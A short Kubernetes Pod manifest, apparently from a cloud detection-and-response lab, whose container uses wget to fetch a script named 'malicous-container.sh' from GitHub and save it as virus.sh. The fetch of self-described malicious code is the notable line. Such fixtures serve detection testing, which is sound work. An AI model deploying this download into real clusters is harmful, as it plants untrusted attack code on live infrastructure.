apiVersion: v1
kind: Pod
metadata:
  name: alpine-cdr
  labels:
    app: alpine
spec:
  containers:
  - name: alpine
    image: alpine:latest
    command: ["/bin/sh", "-c", "wget -q https://raw.githubusercontent.com/hankthebldr/xsiam-prisma-cdr-lab/refs/heads/alpha/1.0/malicous-container/malicous-container.sh -O virus.sh && sleep 3600"]
